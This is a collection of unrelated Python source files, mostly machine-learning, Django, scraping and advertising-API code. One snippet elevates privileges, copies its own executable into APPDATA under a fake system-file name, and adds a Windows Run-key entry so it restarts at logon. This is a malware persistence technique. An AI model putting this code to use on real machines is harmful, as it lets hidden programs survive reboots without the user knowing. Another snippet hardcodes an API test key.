# To run this example you'll need to provide your own images.
# For required aspect ratios and recommended dimensions please see
# Image remarks at https://go.microsoft.com/fwlink/?linkid=872754.
MEDIA_FILE_PATH = "c:\dev\media\\"
RESPONSIVE_AD_MEDIA_FILE_NAME = "imageresponsivead1200x628.png"
IMAGE_AD_EXTENSION_MEDIA_FILE_NAME = "imageadextension300x200.png"
def main(authorization_data):
try:
responsive_ad_image_media = get_image_media(
"Image191x100",
MEDIA_FILE_PATH + RESPONSIVE_AD_MEDIA_FILE_NAME)
image_ad_extension_media = get_image_media(
"Image15x10",
MEDIA_FILE_PATH + IMAGE_AD_EXTENSION_MEDIA_FILE_NAME)
add_media = {
'Media':
[
responsive_ad_image_media,
image_ad_extension_media
]
}
output_status_message("Ready to upload image media:")
output_array_of_media(add_media)
output_status_message("-----\nAddMedia:")
media_ids = campaign_service.AddMedia(
AccountId=authorization_data.account_id,
Media=add_media)
output_status_message("MediaIds:")
output_array_of_long(media_ids)
# Get the media representations to confirm the stored dimensions
# and get the Url where you can later view or download the media.
output_status_message("-----\nGetMediaMetaDataByAccountId:")
get_responsive_ad_mediametadata = campaign_service.GetMediaMetaDataByAccountId(
MediaEnabledEntities='ResponsiveAd',
PageInfo=None)
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_responsive_ad_mediametadata)
output_status_message("-----\nGetMediaMetaDataByAccountId:")
get_image_ad_extension_mediametadata = campaign_service.GetMediaMetaDataByAccountId(
MediaEnabledEntities='ImageAdExtension',
PageInfo=None)
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_image_ad_extension_mediametadata)
output_status_message("-----\nGetMediaMetaDataByIds:")
get_mediametadata = campaign_service.GetMediaMetaDataByIds(
MediaIds=media_ids).MediaMetaData
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_mediametadata)
# Delete the account's media.
output_status_message("-----\nDeleteMedia:")
delete_media_response = campaign_service.DeleteMedia(
authorization_data.account_id,
media_ids)
for id in media_ids['long']:
output_status_message("Deleted Media Id {0}".format(id))
except WebFault as ex:
output_webfault_errors(ex)
except Exception as ex:
output_status_message(ex)
def get_image_media(
media_type,
image_file_name):
image = campaign_service.factory.create('Image')
image.Data = get_bmp_base64_string(image_file_name)
image.MediaType = media_type
image.Type = "Image"
return image
def get_bmp_base64_string(image_file_name):
image = open(image_file_name, 'rb')
image_bytes = image.read()
base64_string = base64.encodestring(image_bytes)
return base64_string
# Main execution
if __name__ == '__main__':
print("Loading the web service client proxies...")
authorization_data=AuthorizationData(
account_id=None,
customer_id=None,
developer_token=<PASSWORD>,
authentication=None,
)
campaign_service=ServiceClient(
service='CampaignManagementService',
version=13,
authorization_data=authorization_data,
environment=ENVIRONMENT,
)
authenticate(authorization_data)
main(authorization_data)
|
67391
|
import numpy as np
import torch
import torch.nn.functional as F
from nnlib.nnlib import visualizations as vis
from nnlib.nnlib import losses, utils
from modules import nn_utils
from methods.predict import PredictGradBaseClassifier
class LIMIT(PredictGradBaseClassifier):
""" The main method of "Improving generalization by controlling label-noise
information in neural network weights" paper. This method trains a classifier
using gradients predict by another network without directly using labels.
As in the paper, only the gradient with respect to the output of the last layer
is predicted, the remaining gradients are computed using backpropogation, starting
with the predicted gradient.
For more details, refer to the paper at https://arxiv.org/abs/2002.07933.
"""
@utils.capture_arguments_of_init
def __init__(self, input_shape, architecture_args, device='cuda',
grad_weight_decay=0.0, lamb=1.0, sample_from_q=False,
q_dist='Gaussian', load_from=None, warm_up=0, **kwargs):
"""
:param input_shape: the input shape of an example. E.g. for CIFAR-10 this is (3, 32, 32).
:param architecture_args: dictionary usually parsed from a json file from the `configs`
directory. This specifies the architecture of the classifier and the architecture of
the gradient predictor network: `q-network`. If you don't want to parse the networks
from arguments, you can modify the code so that self.classifier and self.q_network
directly point to the correct models.
:param device: the device on which the model is stored and executed.
:param grad_weight_decay: the strength of regularization of the mean of the predicted gradients,
||\mu||_2^2. Usually values from [0.03 - 10] work well. Refer to the paper for more guidance.
:param lamb: this is the coefficient in front of the H(p, q) term. Unless `sample_from_q=True`,
setting this to anything but 1.0 has no effect. When `sample_from_q=True`, `lamb` specifies
the variance of the predicted gradients.
:param sample_from_q: whether to sample from the q distribution (predicted gradient distribution),
or to use the mean.
:param q_dist: what distribution predicted gradients should follow. Options are 'Gaussian', 'Laplace',
'ce'. The names of the first 2 speak about themselves and were used in the paper under names LIMIT_G,
and LIMIT_L. The option 'ce' corresponds to a hypothetical case when H(p,q) reduces to
CE(q_label_pred, actual_label). This latter option may work better for some datasets. When
`q_dist=ce`, then `sample_from_q` has to be false.
:param load_from: path to a file where another model (already trained) was saved. This will be loaded,
and the training will continue from this starting point. Note that the saved model needs to be saved
using nnlib.nnlib.utils.save function.
:param warm_up: number of initial epochs for which the classifier is not trained at all. This is done to
give the q-network enough time to learn meaningful gradient predictions before using those predicted
gradients to train the classifier.
:param kwargs: additional keyword arguments that are passed to the parent methods. For this class it
can be always empty.
"""
super(LIMIT, self).__init__(**kwargs)
self.args = None # this will be modified by the decorator
self.input_shape = [None] + list(input_shape)
self.architecture_args = architecture_args
self.grad_weight_decay = grad_weight_decay
self.lamb = lamb
self.sample_from_q = sample_from_q
self.q_dist = q_dist
self.load_from = load_from
self.warm_up = warm_up
# lamb is the coefficient in front of the H(p,q) term. It controls the variance of predicted gradients.
if self.q_dist == 'Gaussian':
self.grad_replacement_class = nn_utils.get_grad_replacement_class(
sample=self.sample_from_q, standard_dev=np.sqrt(1.0 / 2.0 / (self.lamb + 1e-12)), q_dist=self.q_dist)
elif self.q_dist == 'Laplace':
self.grad_replacement_class = nn_utils.get_grad_replacement_class(
sample=self.sample_from_q, standard_dev=np.sqrt(2.0) / (self.lamb + 1e-6), q_dist=self.q_dist)
elif self.q_dist == 'ce':
# This is not an actual distributions. Instead, this correspond to hypothetical case when
# H(p,q) term results to ce(q_label_pred, actual_label).
assert not self.sample_from_q
self.grad_replacement_class = nn_utils.get_grad_replacement_class(sample=False)
else:
raise NotImplementedError()
# initialize the network
self.classifier, output_shape = nn_utils.parse_network_from_config(args=self.architecture_args['classifier'],
input_shape=self.input_shape)
self.classifier = self.classifier.to(device)
self.num_classes = output_shape[-1]
self.q_network, _ = nn_utils.parse_network_from_config(args=self.architecture_args['q-network'],
input_shape=self.input_shape)
self.q_network = self.q_network.to(device)
if self.load_from is not None:
print("Loading the gradient predictor model from {}".format(load_from))
import methods
stored_net = utils.load(load_from, methods=methods, device='cpu')
stored_net_params = dict(stored_net.classifier.named_parameters())
for key, param in self.q_network.named_parameters():
param.data = stored_net_params[key].data.to(device)
def forward(self, inputs, grad_enabled=False, **kwargs):
torch.set_grad_enabled(grad_enabled)
x = inputs[0].to(self.device)
# compute classifier predictions
pred = self.classifier(x)
# predict the gradient wrt to logits
q_label_pred = self.q_network(x)
q_label_pred_softmax = torch.softmax(q_label_pred, dim=1)
# NOTE: we detach here too, so that the classifier is trained using the predicted gradient only
pred_softmax = torch.softmax(pred, dim=1).detach()
grad_pred = pred_softmax - q_label_pred_softmax
# replace the gradients
pred_before = pred
pred = self.grad_replacement_class.apply(pred, grad_pred)
out = {
'pred': pred,
'q_label_pred': q_label_pred,
'grad_pred': grad_pred,
'pred_before': pred_before
}
return out
def compute_loss(self, inputs, labels, outputs, grad_enabled, **kwargs):
torch.set_grad_enabled(grad_enabled)
pred_before = outputs['pred_before']
grad_pred = outputs['grad_pred']
y = labels[0].to(self.device)
y_one_hot = F.one_hot(y, num_classes=self.num_classes).float()
# classification loss
classifier_loss = F.cross_entropy(input=outputs['pred'], target=y)
# compute the actual gradient
# NOTE: we detach here too, so that the classifier is trained using the predicted gradient only
pred_softmax = torch.softmax(pred_before.detach(), dim=1)
grad_actual = pred_softmax - y_one_hot
# I(g : y | x) penalty
if self.q_dist == 'Gaussian':
info_penalty = losses.mse(grad_pred, grad_actual)
elif self.q_dist == 'Laplace':
info_penalty = losses.mae(grad_pred, grad_actual)
elif self.q_dist == 'ce':
info_penalty = losses.get_classification_loss(target=y_one_hot,
pred=outputs['q_label_pred'],
loss_function='ce')
else:
raise NotImplementedError()
batch_losses = {
'classifier': classifier_loss,
'info_penalty': info_penalty
}
# add predicted gradient norm penalty
if self.grad_weight_decay > 0:
grad_l2_loss = self.grad_weight_decay * \
torch.mean(torch.sum(grad_pred ** 2, dim=1), dim=0)
batch_losses['pred_grad_l2'] = grad_l2_loss
return batch_losses, outputs
def on_epoch_start(self, partition, epoch, **kwargs):
super(LIMIT, self).on_epoch_start(partition=partition, epoch=epoch, **kwargs)
if partition == 'train':
requires_grad = (epoch >= self.warm_up)
for param in self.classifier.parameters():
param.requires_grad = requires_grad
def visualize(self, train_loader, val_loader, tensorboard=None, epoch=None, **kwargs):
visualizations = super(LIMIT, self).visualize(train_loader, val_loader,
tensorboard, epoch)
# visualize q_label_pred
fig, _ = vis.plot_predictions(self, train_loader, key='q_label_pred')
visualizations['predictions/q-label-pred-train'] = fig
if val_loader is not None:
fig, _ = vis.plot_predictions(self, val_loader, key='q_label_pred')
visualizations['predictions/q-label-pred-val'] = fig
return visualizations
|
67425
|
from .transformation_workflows import (AffineTransformationWorkflow,
LinearTransformationWorkflow,
TransformixCoordinateTransformationWorkflow,
TransformixTransformationWorkflow)
|
67447
|
import os, subprocess
if __name__ == "__main__":
move_into_container = list()
if input("Do you want to move some of your local files into to container? This will overwrite files from origin/master. (y/n) ").startswith("y"):
for f in sorted(os.listdir()):
if input("Move %s into container (y/n)? " % f).startswith("y"):
move_into_container.append(f)
if move_into_container:
subprocess.call(["tar", "-czvf", "move_into_container.tar.gz"] + move_into_container)
image_name = input("Name of Image? (Default: Auto-PyTorch.simg) ") or "Auto-PyTorch.simg"
if os.path.exists(image_name) and input("%s exists. Remove (y/n)? " % image_name).startswith("y"):
os.remove(image_name)
print("Building Singularity container. You need to be root for that.")
subprocess.call(["sudo", "singularity", "build", image_name, "scripts/Singularity"])
if move_into_container:
os.remove("move_into_container.tar.gz")
|
67454
|
from easydict import EasyDict as edict
import numpy as np
config = edict()
config.IMG_HEIGHT = 375
config.IMG_WIDTH = 1242
# TODO(shizehao): infer fea shape in run time
config.FEA_HEIGHT = 12
config.FEA_WIDTH = 39
config.EPSILON = 1e-16
config.LOSS_COEF_BBOX = 5.0
config.LOSS_COEF_CONF_POS = 75.0
config.LOSS_COEF_CONF_NEG = 100.0
config.LOSS_COEF_CLASS = 1.0
config.EXP_THRESH = 1.0
config.RBG_MEANS = np.array([[[ 123.68, 116.779, 103.939]]])
def set_anchors(H, W):
B = 9
shape = np.array(
[[ 36., 37.], [ 366., 174.], [ 115., 59.],
[ 162., 87.], [ 38., 90.], [ 258., 173.],
[ 224., 108.], [ 78., 170.], [ 72., 43.]])
# # scale
# shape[:, 0] = shape[:, 0] / config.IMG_HEIGHT
# shape[:, 1] = shape[:, 1] / config.IMG_WIDTH
anchor_shapes = np.reshape(
[shape] * H * W,
(H, W, B, 2)
)
center_x = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, W+1)*float(config.IMG_WIDTH)/(W+1)]*H*B),
(B, H, W)
),
(1, 2, 0)
),
(H, W, B, 1)
)
center_y = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, H+1)*float(config.IMG_HEIGHT)/(H+1)]*W*B),
(B, W, H)
),
(2, 1, 0)
),
(H, W, B, 1)
)
anchors = np.reshape(
np.concatenate((center_x, center_y, anchor_shapes), axis=3),
(-1, 4)
)
return anchors
config.ANCHOR_SHAPE = set_anchors(config.FEA_HEIGHT, config.FEA_WIDTH)
config.NUM_ANCHORS = 9
config.NUM_CLASSES = 3
config.ANCHORS = config.NUM_ANCHORS * config.FEA_HEIGHT * config.FEA_WIDTH
config.PLOT_PROB_THRESH = 0.4
config.NMS_THRESH = 0.4
config.PROB_THRESH = 0.005
config.TOP_N_DETECTION = 64
|
67472
|
def forrest(self):
'''Random Forrest based reduction strategy. Somewhat more
aggressive than for example 'spearman' because there are no
negative values, but instead the highest positive correlation
is minused from all the values so that max value is 0, and then
values are turned into positive. The one with the highest positive
score in the end will be dropped. This means that anything with
0 originally, is a candidate for dropping. Because there are multiple
zeroes in many cases, there is an element of randomness on which one
is dropped.
'''
import wrangle
import numpy as np
# handle conversion to multi_labels
from .reduce_utils import cols_to_multilabel
data = cols_to_multilabel(self)
# get the correlations
corr_values = wrangle.df_corr_randomforest(data, self.reduction_metric)
# drop labels where value is NaN
corr_values.dropna(inplace=True)
# handle the turning around of values (see docstring for more info)
corr_values -= corr_values[0]
corr_values = corr_values.abs()
# get the strongest correlation
corr_values = corr_values.index[-1]
# get the label, value, and dtype from the column header
label, dtype, value = corr_values.split('~')
# convert things back to their original dtype
value = np.array([value]).astype(dtype)[0]
# this is where we modify the parameter space accordingly
self.param_object.remove_is(label, value)
return self
|
67476
|
sns.catplot(data=density_mean, kind="bar",
x='Bacterial_genotype',
y='optical_density',
hue='Phage_t',
row="experiment_time_h",
sharey=False,
aspect=3, height=3,
palette="colorblind")
|
67517
|
import torch
from torch import nn
from torch.autograd import Variable
import random
print_shape_flag = True
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, output_max_len, vocab_size):
super(Seq2Seq, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.output_max_len = output_max_len
self.vocab_size = vocab_size
# src: Variable
# tar: Variable
def forward(self, src, tar, src_len, lambd, teacher_rate, train=True):
tar = tar.permute(1, 0) # time_s, batch
batch_size = src.size(0)
#max_len = tar.size(0) # <go> true_value <end>
outputs = Variable(torch.zeros(self.output_max_len-1, batch_size, self.vocab_size), requires_grad=True) # (14, 32, 62) not save the first <GO>
outputs = outputs.cuda()
#src = Variable(src)
out_enc, hidden_enc, out_domain = self.encoder(src, src_len, lambd)
# t,b,f layers, b,f b, fixed_length
global print_shape_flag
if print_shape_flag:
print('First batch shape: (The shape of batches are not same)')
print(out_enc.shape, self.output_max_len)
print_shape_flag = False
output = Variable(self.one_hot(tar[0].data))
attns = []
hidden = hidden_enc
#hidden = hidden_enc.unsqueeze(0) # 1, batch, hidden_size
#init_hidden_dec = [hidden] * self.decoder.n_layers
#hidden = torch.cat(init_hidden_dec, dim=0)
attn_weights = Variable(torch.zeros(out_enc.shape[1], out_enc.shape[0]), requires_grad=True).cuda() # b, t
for t in range(0, self.output_max_len-1): # max_len: groundtruth + <END>
teacher_force_rate = random.random() < teacher_rate
output, hidden, attn_weights = self.decoder(
output, hidden, out_enc, src_len, attn_weights)
outputs[t] = output
#top1 = output.data.topk(1)[1].squeeze()
output = Variable(self.one_hot(tar[t+1].data) if train and teacher_force_rate else output.data)
attns.append(attn_weights.data.cpu()) # [(32, 55), ...]
return outputs, attns, out_domain
def one_hot(self, src): # src: torch.cuda.LongTensor
ones = torch.eye(self.vocab_size).cuda()
return ones.index_select(0, src)
|
67542
|
from django.urls import reverse
from django.contrib.admin.templatetags.admin_modify import submit_row
from django.utils.encoding import force_text
from django.template import Library
register = Library()
@register.inclusion_tag('subadmin/breadcrumbs.html', takes_context=True)
def subadmin_breadcrumbs(context):
request = context['request']
opts = context['opts']
root = {
'name': request.subadmin.root['object']._meta.app_config.verbose_name,
'url': reverse('admin:app_list', kwargs={'app_label': request.subadmin.root['object']._meta.app_label})
}
breadcrumbs =[]
view_args = list(request.subadmin.view_args)
i = 0
subadmin_parents = request.subadmin.parents[::-1]
for parent in subadmin_parents:
adm = parent['admin']
obj = parent['object']
breadcrumbs.extend([{
'name': obj._meta.verbose_name_plural,
'url': adm.reverse_url('changelist', *view_args[:i]),
'has_change_permission': adm.has_change_permission(request),
}, {
'name': force_text(obj),
'url': adm.reverse_url('change', *view_args[:i + 1]),
'has_change_permission': adm.has_change_permission(request, obj),
}])
i += 1
return {
'root': root,
'breadcrumbs': breadcrumbs,
'opts': opts,
}
@register.simple_tag(takes_context=True)
def subadmin_url(context, viewname, *args, **kwargs):
subadmin = context['request'].subadmin
view_args = subadmin.base_url_args[:-1] if subadmin.object_id else subadmin.base_url_args
return reverse('admin:%s_%s' % (subadmin.base_viewname, viewname), args=view_args + list(args), kwargs=kwargs)
@register.inclusion_tag('subadmin/submit_line.html', takes_context=True)
def subadmin_submit_row(context):
ctx = submit_row(context)
ctx.update({
'request': context['request']
})
return ctx
|
67552
|
import balanced
balanced.configure('ak-test-2eKlj1ZDfAcZSARMf3NMhBHywDej0avSY')
reversal = balanced.Reversal.fetch('/reversals/RV6AleFrrhNHBDpr9W9ozGmY')
reversal.description = 'update this description'
reversal.meta = {
'user.refund.count': '3',
'refund.reason': 'user not happy with product',
'user.notes': 'very polite on the phone',
}
reversal.save()
|
67572
|
from datetime import datetime
from os.path import dirname, join
from unittest.mock import MagicMock
import pytest
from city_scrapers_core.constants import BOARD, TENTATIVE
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_library import ChiLibrarySpider
freezer = freeze_time("2018-12-20")
freezer.start()
session = MagicMock()
res_mock = MagicMock()
res_mock.status_code = 200
session.get.return_value = res_mock
test_response = file_response(
join(dirname(__file__), "files", "chi_library.html"),
url="https://www.chipublib.org/board-of-directors/board-meeting-schedule/",
)
spider = ChiLibrarySpider(session=session)
parsed_items = [item for item in spider.parse(test_response)]
freezer.stop()
def test_title():
assert parsed_items[0]["title"] == "Board of Directors"
def test_description():
assert parsed_items[0]["description"] == ""
def test_start():
assert parsed_items[0]["start"] == datetime(2021, 1, 26, 9)
def test_id():
assert parsed_items[0]["id"] == "chi_library/202101260900/x/board_of_directors"
def test_status():
assert parsed_items[0]["status"] == TENTATIVE
def test_all_day():
assert parsed_items[0]["all_day"] is False
def test_location():
assert parsed_items[0]["location"] == {
"address": "",
"name": "Virtual",
}
def test_links():
assert parsed_items[0]["links"] == [
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-agenda-january-26-2021/", # noqa
"title": "Agenda",
},
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-minutes-january-26-2021/", # noqa
"title": "Minutes",
},
]
@pytest.mark.parametrize("item", parsed_items)
def test_classification(item):
assert item["classification"] == BOARD
@pytest.mark.parametrize("item", parsed_items)
def test_end(item):
assert item["end"] is None
@pytest.mark.parametrize("item", parsed_items)
def test_source(item):
assert (
item["source"]
== "https://www.chipublib.org/board-of-directors/board-meeting-schedule/"
)
|
67574
|
from threading import Thread
from queue import Queue
import numpy as np
from ...libffcv import read
class PageReader(Thread):
def __init__(self, fname:str, queries: Queue, loaded: Queue,
memory: np.ndarray):
self.fname: str = fname
self.queries: Queue = queries
self.memory: np.ndarray = memory
self.page_size = memory.shape[1]
self.loaded: Queue = loaded
super().__init__(daemon=True)
def run(self):
import hashlib
with open(self.fname, 'rb') as handle:
fileno = handle.fileno()
while True:
query = self.queries.get()
# No more work
if query is None:
break
page_number, slot = query
offset = np.uint64(page_number * self.page_size)
length = read(fileno, self.memory[slot], offset)
# print("L", page_number, slot, hashlib.md5(self.memory[slot]).hexdigest(), self.memory[slot].ctypes.data, length)
self.loaded.put(page_number)
|
67577
|
import os
import shutil
import winreg
import sys
import time
from elevate import elevate
elevate()
print("elevated")
curr_executable = sys.executable
print(curr_executable)
time.sleep(5)
app_data = os.getenv("APPDATA")
to_save_file = app_data +"\\"+"system32_data.exe"
time.sleep(5)
print(to_save_file)
if not os.path.exists(to_save_file):
print("Becoming Persistent")
shutil.copyfile(curr_executable, to_save_file)
key = winreg.HKEY_CURRENT_USER
# "Software\Microsoft\Windows\CurrentVersion\Run"
key_value = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
key_obj = winreg.OpenKey(key, key_value, 0, winreg.KEY_ALL_ACCESS)
winreg.SetValueEx(key_obj, "systemfilex64", 0, winreg.REG_SZ, to_save_file)
winreg.CloseKey(key_obj)
else:
print("path doesnt exist")
time.sleep(100)
|
67579
|
import SimpleITK as sitk
import numpy as np
#from segmentation.lungmask import mask
import glob
from tqdm import tqdm
import os
from segmentation.predict import predict,get_model
#from segmentation.unet import UNet
os.environ["CUDA_VISIBLE_DEVICES"] = '6'
lung_dir = '/mnt/data11/seg_of_XCT/lung/CAP/'
leision_dir = '/mnt/data11/seg_of_XCT/lesion/CAP/'
root_dir = '/home/cwx/extra/dr_ct_data/CT/CAP'
filelist = glob.glob(root_dir)
os.makedirs(leision_dir,exist_ok=True)
model2 = './checkpoint_final.pth'
model = get_model(model2,n_classes=2)
print('get model done')
for filepath in filelist:
imagelist = glob.glob(filepath+'/*.nii')
for imagepath in tqdm(imagelist, dynamic_ncols=True):
imagename = imagepath.split('/')[-1]
batch_id = imagepath.split('/')[-2]
if os.path.exists(leision_dir+batch_id+'_'+imagename.replace('.nii','_label.nrrd')):
print(imagename)
continue
input_image = sitk.ReadImage(imagepath)
segmentation = predict(input_image, model = model,batch_size=16,lesion=True)
segmentation[segmentation>1]=1
lung_image = sitk.ReadImage(lung_dir+batch_id+'_'+imagename)
lung_data = sitk.GetArrayFromImage(lung_image)
leision_seg = lung_data*segmentation
leision_seg=np.array(leision_seg,np.uint8)
result_out= sitk.GetImageFromArray(leision_seg)
result_out.CopyInformation(input_image)
sitk.WriteImage(result_out,leision_dir+batch_id+'_'+imagename.replace('.nii','_label.nrrd'))
print(imagename)
|
67616
|
from typing import Callable
def rpc(*, name) -> Callable:
"""Decorate a coroutine as an RPC method that can be executed by the server.
Args:
name: The name of the RPC method
Returns:
A decorator that will mark the coroutine as an RPC method
"""
def decorator(func) -> Callable:
func.__rpc_handler__ = True
func.__name__ = name or func.__name__
return func
return decorator
|
67656
|
from django.contrib import admin
from api.logger import logger
from api.models import User
import registrations.models as models
from reversion_compare.admin import CompareVersionAdmin
class PendingAdmin(CompareVersionAdmin):
search_fields = ('user__username', 'user__email', 'admin_contact_1', 'admin_contact_2')
list_display = (
'get_username_and_mail', 'created_at',
'admin_contact_1', 'admin_1_validated', 'admin_1_validated_date',
'admin_contact_2', 'admin_2_validated', 'admin_2_validated_date',
'email_verified', 'user_is_active'
)
actions = ('activate_users',)
# Get the 'user' objects with a JOIN query
def get_queryset(self, request):
return super().get_queryset(request).select_related('user')
def get_username_and_mail(self, obj):
return obj.user.username + ' - ' + obj.user.email
def user_is_active(self, obj):
return 'Yes' if obj.user.is_active else ''
def activate_users(self, request, queryset):
for pu in queryset:
usr = User.objects.filter(id=pu.user_id).first()
if usr:
if usr.is_active is False:
usr.is_active = True
usr.save()
else:
logger.info(f'User {usr.username} was already active')
else:
logger.info(f'There is no User record with the ID: {pu.user_id}')
def get_actions(self, request):
actions = super(PendingAdmin, self).get_actions(request)
if not request.user.is_superuser:
del actions['activate_users']
return actions
class DomainWhitelistAdmin(CompareVersionAdmin):
list_display = ('domain_name', 'description', 'is_active')
search_fields = ('domain_name',)
ordering = ('domain_name',)
admin.site.register(models.Pending, PendingAdmin)
admin.site.register(models.DomainWhitelist, DomainWhitelistAdmin)
|
67675
|
import numpy as np
from scipy import interpolate
from progressbar import ProgressBar, Bar, Percentage
class ImpulseResponseFunction(object):
'''Internal bemio object to contain impulse response function (IRF) data
'''
pass
class WaveElevationTimeSeries(object):
'''Internal bemio object to contain wave elevation time series data
'''
pass
class WaveExcitationForce(object):
'''Internal bemio object to contain wave excitation force data
'''
pass
class WaveExcitationConvolution(object):
'''
Object for calculating wave excitation force time history using the
convolution method
Parameters:
irf : np.array
Wave excitation force impulse response function.
irf_t : np.array
Time series corresponding to `irf`
eta : np.array
Wave elevation time series
eta_t : np.array
Time series corresponding to `eta`
Attribuites:
self.irf : ImpulseResponseFunction
Object containing excitation force IRF information
self.wave_elevation : WaveElevationTimeSeries
Object containing wave elevation time series data
self.excitation_force : WaveExcitationForce
Object containing wave excitation force data
'''
def __init__(self, irf, irf_t, eta, eta_t):
self.irf = ImpulseResponseFunction()
self.wave_elevation = WaveElevationTimeSeries()
self.excitation_force = WaveExcitationForce()
self.irf.f = irf
self.irf.t = irf_t
self.wave_elevation.eta = eta
self.wave_elevation.t = eta_t
self.wave_elevation.dt = self.wave_elevation.t[1] - self.wave_elevation.t[0]
self._excitation_convolution()
def _excitation_convolution(self):
'''Internal function to perform the wave excitation convolution
'''
eta_interp = interpolate.interp1d(x=self.wave_elevation.t, y=self.wave_elevation.eta, bounds_error=False, fill_value=0.)
irf_interp = interpolate.interp1d(x=self.irf.t, y=self.irf.f, bounds_error=False, fill_value=0.)
# Interpolate the IRF to the dt as the wave elevation data
irf = irf_interp(np.linspace(self.irf.t.min(),self.irf.t.max(),(self.irf.t.max()-self.irf.t.min())/self.wave_elevation.dt+1))
# Assume that the IRF dt is used unless specified by the user
# if self.excitation_force.dt is None:
# self.excitation_force.dt = self.irf.t[1] - self.irf.t[0]
# This code caluclates the wave excitation force manually - the below method that uses the convolve function is much more efficient
# self.excitation_force.t = np.linspace(self.wave_elevation.t.min(), self.wave_elevation.t.max(), (self.wave_elevation.t.max()-self.wave_elevation.t.min())/self.excitation_force.dt+1)
# pbar_max_val = self.excitation_force.t.max()
# pbar = ProgressBar(widgets=['Calculating the excitation force time history:', Percentage(), Bar()], maxval=pbar_max_val).start()
# f_ex = []
# for t in self.excitation_force.t:
# f_ex.append(np.trapz(y=irf_interp(self.irf.t)*eta_interp(t-self.irf.t),x=self.irf.t))
#
# pbar.update(t)
# pbar.finish()
f_ex_conv = np.convolve(self.wave_elevation.eta, irf, mode='same')*self.wave_elevation.dt
self.excitation_force.f = np.array(f_ex_conv)
self.excitation_force.t = self.wave_elevation.t
def convolution(irf, irf_t, eta, eta_t, dt=None):
'''
Function to calculate wave excitation force using the convolution method
Patrameters:
irf : np.array
Wave excitation force impulse response function.
irf_t : np.array
Time series corresponding to `irf`
eta : np.array
Wave elevation time series
eta_t : np.array
Time series corresponding to `eta`
dt : float, optional
Time step for calculating the
Returns:
excitation_force : WaveExcitationConvolution
This function returns a `WaveExcitationConvolution` object with
the wave exciting force and other information. See the
`WaveExcitationConvolution` for more information.
Example:
The following example assumes that variables `irf`, `irf_t`, `eta`, and
`eta_t` of type type(np.array) exist in the workspace. The contents of
these variables are described above.
Calculate excitation force using the convolution method
>>> ex = convolution(irf=irf, irf_t=irf_t, eta=eta, eta_t=eta_t)
Plot the data
>>> plt.figure()
>>> plt.plot(ex.excitation_force.t,ex.excitation_force.f)
'''
excitation_force = WaveExcitationConvolution(irf, irf_t, eta, eta_t)
return excitation_force
|
67758
|
def regularized_MSE_loss(output, target, weights=None, L2_penalty=0, L1_penalty=0):
"""loss function for MSE
Args:
output (torch.Tensor): output of network
target (torch.Tensor): neural response network is trying to predict
weights (torch.Tensor): fully-connected layer weights of network (net.out_layer.weight)
L2_penalty : scaling factor of sum of squared weights
L1_penalty : scalaing factor for sum of absolute weights
Returns:
(torch.Tensor) mean-squared error with L1 and L2 penalties added
"""
loss_fn = nn.MSELoss()
loss = loss_fn(output, target)
if weights is not None:
L2 = L2_penalty * torch.square(weights).sum()
L1 = L1_penalty * torch.abs(weights).sum()
loss += L1 + L2
return loss
# Initialize network
net = ConvFC(n_neurons)
# Train network
train_loss, test_loss = train(net, regularized_MSE_loss, stim_binary, resp_train,
test_data=stim_binary, test_labels=resp_test,
learning_rate=10, n_iter=500,
L2_penalty=1e-4, L1_penalty=1e-6)
# Plot the training loss over iterations of GD
with plt.xkcd():
plot_training_curves(train_loss, test_loss)
|
67807
|
import numpy as np
import tensorflow as tf
class batch_norm(object):
"""Code modification of http://stackoverflow.com/a/33950177"""
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
self.name = name
def __call__(self, x, train=True):
shape = x.get_shape().as_list()
if train:
with tf.variable_scope(self.name) as scope:
self.beta = tf.get_variable("beta", [shape[-1]],
initializer=tf.constant_initializer(0.))
self.gamma = tf.get_variable("gamma", [shape[-1]],
initializer=tf.random_normal_initializer(1., 0.02))
batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')
ema_apply_op = self.ema.apply([batch_mean, batch_var])
self.ema_mean, self.ema_var = self.ema.average(batch_mean), self.ema.average(batch_var)
with tf.control_dependencies([ema_apply_op]):
mean, var = tf.identity(batch_mean), tf.identity(batch_var)
else:
mean, var = self.ema_mean, self.ema_var
normed = tf.nn.batch_norm_with_global_normalization(
x, mean, var, self.beta, self.gamma, self.epsilon, scale_after_normalization=True)
return normed
# standard convolution layer
def conv2d(x, filter_size, stride, inputFeatures, outputFeatures, name):
with tf.variable_scope(name):
w = tf.get_variable("w",[filter_size,filter_size,inputFeatures, outputFeatures], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputFeatures], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, w, strides=[1,stride,stride,1], padding="SAME") + b
return conv
def conv_transpose(x, filter_size, stride, outputShape, name):
with tf.variable_scope(name):
# h, w, out, in
w = tf.get_variable("w",[filter_size,filter_size, outputShape[-1], x.get_shape()[-1]], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputShape[-1]], initializer=tf.constant_initializer(0.0))
convt = tf.nn.conv2d_transpose(x, w, output_shape=outputShape, strides=[1,stride,stride,1])
return convt
# leaky reLu unit
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# fully-conected layer
def dense(x, inputFeatures, outputFeatures, scope=None, with_w=False):
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [inputFeatures, outputFeatures], tf.float32, tf.random_normal_initializer(stddev=0.02))
bias = tf.get_variable("bias", [outputFeatures], initializer=tf.constant_initializer(0.0))
if with_w:
return tf.matmul(x, matrix) + bias, matrix, bias
else:
